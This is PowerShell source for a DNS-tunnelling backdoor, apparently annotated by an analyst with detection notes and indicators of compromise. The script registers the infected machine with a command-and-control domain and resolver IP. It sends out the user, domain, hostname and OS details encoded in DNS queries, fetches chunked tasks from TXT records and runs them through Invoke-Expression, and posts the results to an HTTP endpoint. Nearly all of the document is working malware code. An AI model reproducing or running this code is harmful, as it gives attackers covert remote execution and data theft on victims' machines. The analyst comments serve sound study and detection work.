# This section should be omitted as it is present in the Stager
# (the stager itself is not on this page, so everything below is read stand-alone).
# =============================================================================
# C2 domain list. Every DNS-based call further down builds its query name under
# one of these entries; the pasted value is hellobot.fun (page-sourced indicator).
$domains = @("hellobot.fun")
# Return one element of $DomainList: the element itself when the list holds
# exactly one, otherwise a uniformly random one (Get-Random over the count).
function Pick-Domain {
    Param($DomainList)
    if ($DomainList.count -eq 1) {
        return $DomainList
    }
    # Random index in [0, count); the [array] cast keeps .count meaningful if a
    # caller passes something that is not already an array.
    return $DomainList[(Get-Random -Maximum ([array]$DomainList).count)]
}
  11.  
# Host identifier ("hwid") placed as a DNS label in every C2 query below:
# the first 10 uppercase-hex characters of MD5(UTF-8 BIOS serial number),
# read from Win32_BIOS.SerialNumber via WMI. The value is stable per machine,
# so the same label recurs across all of this host's queries — a useful pivot
# when correlating DNS logs for this traffic.
function Identify-Machine() {
    $serial = Get-WmiObject Win32_BIOS | Select -ExpandProperty SerialNumber
    $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
    # 16 hash bytes -> "X2" each -> 32-character hex string.
    $hash = ($md5.ComputeHash([system.Text.Encoding]::UTF8.GetBytes($serial)) | foreach { $_.ToString("X2") }) -join ""

    return $hash.Substring(0, 10)
}
  19.  
# Invoke $Action against one domain picked from $DomainList. On any exception
# the function recurses with that domain filtered out, until an invocation
# succeeds or the list is exhausted (then "No domains" is thrown). The
# scriptblocks passed in elsewhere on this page read $domain by name rather
# than declaring a param, so they appear to rely on PowerShell's dynamic
# scoping to see the $domain assigned here — TODO confirm.
function Try-Domains {
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)]$DomainList, [Parameter()][scriptblock]$Action)

    if ($DomainList.count -eq 0) {
        Throw "No domains"
    }
    $domain = Pick-Domain $DomainList
    try {
        return $Action.Invoke($domain)
    } Catch {
        # NOTE(review): the operator below is written with an en-dash (U+2013),
        # not an ASCII hyphen; kept byte-for-byte as pasted. PowerShell's
        # tokenizer treats Unicode dashes as "-", so this still appears to parse.
        return Try-Domains ($DomainList | Where-Object { $_ –ne $domain }) $Action
    }
}
  34.  
# One DNS lookup of $dns with record type $type. Two details matter for
# detection: -Server pins every query to 212.32.242.146 (page-sourced
# indicator) instead of the host's configured resolver, and -DnsOnly restricts
# resolution to the DNS protocol (no LLMNR/NetBIOS fallback), so each call is a
# direct query to that address. -ErrorAction Stop turns a failed lookup into an
# exception, which is what Try-Domains catches to rotate domains.
function Do-DNS {
    [CmdletBinding()]
    param([Parameter()]$dns, [Parameter()]$type)

    Write-Debug "[DNS] (${type}) ==> ${dns}"
    $data = Resolve-DnsName -Type $type $dns -ErrorAction Stop -DnsOnly -Debug:$false -Server 212.32.242.146
    return $data
}
  43.  
# Do-DNS wrapper that returns the TXT record's Strings concatenated into one
# string (no separator). $type is forwarded as-is; every caller on this page
# passes TXT.
function Do-DNS-TXT {
    [CmdletBinding()]
    param([Parameter()]$dns, [Parameter()]$type)

    return (Do-DNS $dns $type | Select -ExpandProperty Strings) -join ''
}
  50.  
# Inbound payload decoder: Base64 -> gzip-decompress -> UTF-8 string.
# Used for TXT-delivered content (see Get-Tasks and Get-WWW-PS); the inverse of
# Encode-HTTP-Data. The decoded text is logged in full at debug level.
function Decode-String {
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)]$Code)
    Write-Debug "Decode-Str: $Code"
    $gzipBytes = [System.Convert]::FromBase64String($Code)
    # Parenthesised call passes the whole byte array as a single argument.
    $codeBytes = Get-DecompressedByteArray($gzipBytes)
    return [system.Text.Encoding]::UTF8.GetString($codeBytes)
}
  59.  
  60. # =============================================================================
# gzip-compress $byteArray (System.IO.Compression.GzipStream, Compress mode)
# and emit the compressed bytes. Generic helper; the outbound encoders on this
# page call it before Base58/Base64 encoding.
function Get-CompressedByteArray {
    [CmdletBinding()]
    Param (
        [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
        [byte[]] $byteArray = $(Throw("-byteArray is required"))
    )
    Process {
        Write-Verbose "Get-CompressedByteArray"
        [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
        $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
        $gzipStream.Write( $byteArray, 0, $byteArray.Length )
        # Closing the gzip stream flushes the trailer; the underlying
        # MemoryStream can still be read with ToArray() after Close().
        $gzipStream.Close()
        $output.Close()
        $tmp = $output.ToArray()
        Write-Output $tmp
    }
}
  78.  
# gzip-decompress $byteArray (GzipStream, Decompress mode) and emit the plain
# bytes. Counterpart of Get-CompressedByteArray; called by Decode-String.
function Get-DecompressedByteArray {

    [CmdletBinding()]
    Param (
        [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
        [byte[]] $byteArray = $(Throw("-byteArray is required"))
    )
    Process {
        Write-Verbose "Get-DecompressedByteArray"
        # Note: assigning $input shadows PowerShell's automatic $input variable
        # inside this Process block; it is only used locally here.
        # The leading comma wraps the byte array so it is passed as one argument.
        $input = New-Object System.IO.MemoryStream( , $byteArray )
        $output = New-Object System.IO.MemoryStream
        $gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
        $gzipStream.CopyTo( $output )
        $gzipStream.Close()
        $input.Close()
        [byte[]] $byteOutArray = $output.ToArray()
        Write-Output $byteOutArray
    }
}
  98.  
# Base58 (Bitcoin alphabet: no 0, O, I, l) encoding of $bytes. Base58 output is
# letters and digits only, which is why it is chosen for DNS labels in
# Encode-Data. Leading 0x00 bytes become leading '1' characters, as in the
# standard scheme. Arithmetic is done on a System.Numerics.BigInteger via
# PowerShell operator overload resolution.
function Encode-Base58{
    [CmdletBinding()]
    param([Parameter()]$bytes)

    $base58digits = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

    # get big int representation (big-endian fold of the byte array)
    $dBig = New-Object System.Numerics.BigInteger 0
    $bytes | %{ $dBig = $dBig * 256 + $_ }

    # combine into string: repeated divmod by 58, least-significant digit first,
    # each new digit prepended so the result reads most-significant first
    $result = [System.String]::Empty
    while ($dBig -gt 0) {
        $rem = $dBig % 58
        $dBig /= 58
        $result = $base58digits[$rem] + $result
    }
    # one '1' per leading zero byte (stops at the first non-zero byte)
    foreach ($b in $bytes) {
        if ($b -ne 0) { break }
        $result = '1' + $result
    }

    return $result
}
  123.  
# Outbound DNS encoder: UTF-8 -> gzip -> Base58 -> labels of at most 63
# characters joined with '.'. The 63-char split respects the per-label DNS
# limit; nothing here bounds the total name length, so large inputs yield names
# that exceed what a resolver will accept. The resulting long, high-entropy
# alphanumeric labels are the observable signature of this channel in DNS logs.
function Encode-Data{
    [CmdletBinding()]
    param([Parameter()]$data)
    $bytes = [system.Text.Encoding]::UTF8.GetBytes($data)
    $gzipbytes = Get-CompressedByteArray $bytes
    $b58bytes = Encode-Base58 $gzipbytes
    # regex '.{1,63}' greedily takes up to 63 chars per match
    $split = ([regex]::matches($b58bytes, '.{1,63}') | %{$_.value}) -join '.'

    return $split
}
  134.  
# Outbound HTTP encoder: UTF-8 -> gzip -> Base64 (inverse of Decode-String).
# Computed but not actually sent by Send-HTTP-Data on this page.
function Encode-HTTP-Data {
    [CmdletBinding()]
    param([Parameter()]$data)

    $bytes = [system.Text.Encoding]::UTF8.GetBytes($data)
    $gzipbytes = Get-CompressedByteArray $bytes
    return [System.Convert]::ToBase64String($gzipbytes)
}
  143.  
  144. # =============================================================================
  145.  
# Check-in: TXT query for "<hwid>.add.<domain>" via Try-Domains; the server is
# expected to answer with the single string "1", anything else throws
# "Bad registration" (caught by the top-level try at the bottom of the page).
# Reads $domain from the Try-Domains scope rather than a param.
function Register-Bot {
    [CmdletBinding()]
    param([Parameter()]$DomainList)

    $regSuccess = Try-Domains $DomainList {
        return Do-DNS-TXT "$(Identify-Machine).add.$domain" TXT
    }
    if ($regSuccess -ne "1") {
        throw "Bad registration"
    }
}
  157.  
# Run every value of the hashtable $Data as a command through Exec-Timeout and
# return a new hashtable mapping the same keys to the command output. An
# exception from Exec-Timeout is mapped to the string "Failure"; a timeout
# inside Exec-Timeout yields its own "failure" default. This is the task
# dispatcher: both the fingerprinting commands in $baseData and any server-
# supplied tasks from Get-Tasks pass through here.
function Execute-Dict {
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)]$Data)

    $output = @{}
    $Data.GetEnumerator() | % {

        $val = try { Exec-Timeout $_.value } catch { "Failure" }
        $output[$_.key] = $val
    }
    return $output
}
  170.  
# Initial fingerprint exfiltration over DNS. Each key/value in $Data is executed
# via Execute-Dict, the output is Base58-encoded with Encode-Data, and an A
# query is sent for "<enc>.<key>.<hwid>.i.<domain>". The server acknowledges
# with 1.1.1.1; any other address throws so Try-Domains rotates to the next
# domain. Failures are swallowed per item and only logged at debug level.
function Do-Bad-Job {
    [CmdletBinding()]
    param([Parameter()]$DomainList, [Parameter()]$Data)

    Execute-Dict $Data | %{$_.GetEnumerator()} | %{
        try {
            $letter = $_.key
            $sdata = $_.value
            $enc = Encode-Data $sdata
            # Debug log contains the raw collected value and its encoded form.
            Write-Debug "[General data] ${letter}: ${sdata} => ${enc}"

            Try-Domains $DomainList {
                $response = Do-DNS "${enc}.${letter}.$(Identify-Machine).i.$domain" A | Select -ExpandProperty IPAddress
                if ($response -ne '1.1.1.1') {
                    Throw 'Bad response 3'
                }
            }
        } catch {
            # ${letters} is not assigned anywhere on this page (the loop
            # variable is $letter), so this message logs an empty name.
            Write-Debug "[General data] Unable to send ${letters}"
        }
    }

    Write-Debug "[General data] Complete"
}
# Poll the beacon interval mode: TXT query for "<hwid>.mx1.<domain>", returned
# as a string. Main-Loop maps '0' and '1' to sleep intervals and treats '3'
# specially.
function Read-Mode {
    [CmdletBinding()]
    param([Parameter()]$DomainList)

    return Try-Domains $DomainList {
        return Do-DNS-TXT "$(Identify-Machine).mx1.$domain" TXT
    }
}
  203.  
# Fetch and decode a TXT payload from "<hwid>.www.<domain>" (Base64+gzip via
# Decode-String). Not called anywhere else on this page; it is likely a
# single-record predecessor of the chunked Get-Tasks walk — TODO confirm.
# Writes the chosen domain to the console with Write-Host.
function Get-WWW-PS {
    [CmdletBinding()]
    param([Parameter()]$DomainList)
    return Try-Domains $DomainList {
        Write-Host $domain
        return Do-DNS-TXT "$(Identify-Machine).www.$domain" TXT | Decode-String
    }
}
  212.  
# Result upload over HTTP: a form POST to
# http://212.32.242.146/index.php?r=bot-result%2Findex (page-sourced indicator)
# with two fields, "hwid" (Identify-Machine) and "data" ($data as JSON, depth 4).
# Plain HTTP, no TLS, and the body is not compressed or encoded: $encdata is
# computed but never used. $DomainList is accepted but unused; the commented
# block below shows an earlier per-domain variant that was replaced by the
# fixed IP. On HTTP failure only the status is printed; nothing is retried.
function Send-HTTP-Data {
    [CmdletBinding()]
    param([Parameter()]$DomainList, [Parameter()]$data)

    # encode data (result unused below)
    $encdata = Encode-HTTP-Data $data

    $myData = @{"hwid" = $(Identify-Machine); "data" = $data | ConvertTo-Json -Depth 4}
    # This expression is not assigned, so the JSON is emitted to the function's
    # output stream (and therefore to the caller) as a side effect.
    $myData["data"] | Out-String
    try {
        Invoke-WebRequest -Uri "http://212.32.242.146/index.php?r=bot-result%2Findex" -Body $myData -Method POST
        #Invoke-WebRequest -UseBasicParsing http://212.32.242.146/index.php?r=bot-result%2Findex -ContentType "application/json" -Method POST -Body "{ 'hwid':$myData["hwid"], 'data':$myData["data"]}"
    } catch {
        Write-Host "StatusCode:" $_.Exception.Response.StatusCode.value__
        Write-Host "StatusDescription:" $_.Exception.Response.StatusDescription
    }

    #return Try-Domains $DomainList {
    # Write-Debug "[HTTP] ===> http://$(Identify-Machine).http.$domain"
    # #return Invoke-WebRequest -Uri "http://$(Identify-Machine).http.$domain" -Body $data -Method POST
    # return Invoke-WebRequest -Uri "http://212.32.242.146/index.php?r=bot-result%2Findex" -Body $myData -Method POST
    #}
}
  236.  
# Beacon loop. Each iteration: read the interval mode over DNS, pull a task
# JSON document with Get-Tasks, run every property except "taskType" through
# Execute-Dict, and POST the results with Send-HTTP-Data; then sleep.
# Observations on the visible code:
#  - Read-Mode is called with the script-level $domains, not the $DomainList
#    parameter, so the parameter only reaches Get-Tasks and Send-HTTP-Data.
#  - In PowerShell, `break` inside `switch` leaves the switch, not the
#    enclosing `while`; mode '3' therefore does not stop the loop, it just
#    leaves $interval at 0 (no sleep, i.e. continuous polling). Any mode other
#    than '0'/'1' behaves the same way.
#  - Mode '0' -> 30 minutes, mode '1' -> 12 hours between iterations.
#  - All exceptions in the work section are swallowed and the loop continues.
function Main-Loop {
    [CmdletBinding()]
    param([Parameter()]$DomainList)
    Write-Host "Main start"
    while (1) {
        # get mode
        $mode = Read-Mode $domains
        $interval = 0
        switch ($mode){
            '3' { break }
            '0' { $interval = 30*60 }
            '1' { $interval = 12*60*60 }
        }
        Write-Host "Interval mode: $mode"
        try {
            # NO www=exit HANDLING

            $data = Get-Tasks $DomainList
            $taskType = ''
            $data_new = @{}
            # Split the JSON object: "taskType" is kept aside, every other
            # property name -> command string goes into $data_new for execution.
            (ConvertFrom-Json $data).psobject.properties | Foreach { if ($_.Name -ne 'taskType' ) { $data_new[$_.Name] = $_.Value} else {$taskType = $_.Value} }

            $data = Execute-Dict $data_new
            $data['taskType'] = $taskType
            Write-Debug "[Main-Loop] Data: ${data}"

            # convert to dictionary if not a dictionary
            if ($data -isnot [System.Collections.IDictionary]){
                $data = @{'response'=$data}
            }

            # if not OK code -- exception
            Send-HTTP-Data $DomainList $data
        } catch {
            Write-Debug "[Main-Loop] Execution crashed"
            Write-Host $Error[0]
        }
        Write-Debug "[Main-Loop] Start sleeping for ${interval}s"
        Start-Sleep -s $interval
    }
}
  278.  
# Execute an arbitrary PowerShell command string with a 10-second cap. The
# string is passed to Invoke-Expression inside a Start-Job scriptblock, so it
# runs in a separate background PowerShell host process; if Wait-Job times out
# the default "failure" is returned and the job is force-removed (the child
# process is torn down with it). The command string is echoed to the console
# with Write-Host before it runs.
# Detection note: PowerShell spawning a background job host that calls
# Invoke-Expression on server-supplied text is the primary host-side signal of
# this sample (script block / module logging and 4104 events capture it).
function Exec-Timeout {
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)][string]$command)
    $timeoutSeconds = 10
    $val = "failure"
    Write-Host $command
    $code = {
        param($c)
        Invoke-Expression $c
    }

    $j = Start-Job -ScriptBlock $code -ArgumentList $command
    # Wait-Job returns the job object (truthy) only if it finished in time.
    if (Wait-Job $j -Timeout $timeoutSeconds) {
        $val = Receive-Job $j
    }
    Remove-Job -force $j
    return $val
}
  297.  
# Chunked task download over DNS. For part index n = 0, 1, 2, ... the bot
# queries "<hwid>.www.<n>.<domain>": the A record acts as a checksum and the
# TXT record carries the chunk. A chunk is accepted when the A address,
# converted to a binary string, equals the binary form of the first 8 hex
# characters of MD5(TXT text); the loop ends when the A record is 0.0.0.0.
# Accepted chunks are concatenated and handed to Decode-String (Base64+gzip).
# Ip-To-Long, To-Bin-Number and Hex-To-Int are not defined on this page
# (presumably supplied by the stager mentioned at the top — TODO confirm).
# A rejected chunk is simply re-queried for the same index with the same
# domain; only an accepted chunk re-picks the domain and advances the index.
function Get-Tasks {
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)]$DomainList)
    $stage = ''
    $domain = Pick-Domain $DomainList
    $partStage = 0
    $dns = "$(Identify-Machine).www.$partStage.$domain"
    $dnsResponseA = Do-Dns $dns A | Select -ExpandProperty IPAddress
    while ($dnsResponseA -ne '0.0.0.0') {
        $bigInt = Ip-To-Long $dnsResponseA
        $bin = To-Bin-Number $bigInt

        $dnsResponseTXT = (Do-DNS $dns TXT | Select -ExpandProperty Strings) -join ''
        $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
        $hash = ($md5.ComputeHash([system.Text.Encoding]::UTF8.GetBytes($dnsResponseTXT)) | foreach { $_.ToString("X2") }) -join ""
        # first 8 hex chars (32 bits) of the digest, same width as an IPv4 address
        $txtHex = [string]$hash[0] + [string]$hash[1] + [string]$hash[2] + [string]$hash[3] + [string]$hash[4] + [string]$hash[5] + [string]$hash[6] + [string]$hash[7]
        $txtInt = Hex-To-Int $txtHex
        $txtBin = To-Bin-Number $txtInt

        if ([string]$bin -eq [string]$txtBin) {
            $stage += $dnsResponseTXT
            $domain = Pick-Domain $DomainList
            $partStage++
        }
        $dns = "$(Identify-Machine).www.$partStage.$domain"
        $dnsResponseA = Do-Dns $dns A | Select -ExpandProperty IPAddress
    }

    return [string]$stage | Decode-String
}
  328.  
  329.  
# Host fingerprint commands, keyed by the single-letter DNS label used in
# Do-Bad-Job. Values are single-quoted so nothing is expanded here; each string
# is executed later by Exec-Timeout (Invoke-Expression) and the output is sent
# as "<encoded output>.<key>.<hwid>.i.<domain>". Collected: user name, user
# domain, OS caption, hostname, a constant '1', OS organization (or "NoOrg"),
# and OS architecture.
$baseData = @{
    'u'='$env:username'
    'd'='$env:userdomain'
    'o'='Get-WmiObject Win32_OperatingSystem | Select -ExpandProperty Caption'
    'h'='hostname'
    'a'='1'
    'org'='Get-WmiObject Win32_OperatingSystem | Select -ExpandProperty Organization | %{if ([string]::IsNullOrEmpty($_)) {"NoOrg"} else {$_}}'
    'arc'='Get-WmiObject Win32_OperatingSystem | Select -ExpandProperty OSArchitecture'
}
  339.  
# Entry sequence: force UTF-8 console output, then register with the C2 over
# DNS, exfiltrate the $baseData fingerprint, and enter the beacon loop.
# A failure in any of the three steps (e.g. "Bad registration" or "No domains")
# ends the script; the exception text is only written at debug level, so with
# default preferences the process exits silently.
try {
    [Console]::OutputEncoding = [Text.UTF8Encoding]::UTF8
} catch {
    Write-Host $Error[0]
}
try {
    # register bot
    Register-Bot $domains
    # send data
    Do-Bad-Job $domains $baseData
    # enter main loop
    Main-Loop $domains
} catch {
    Write-Debug $Error[0]
}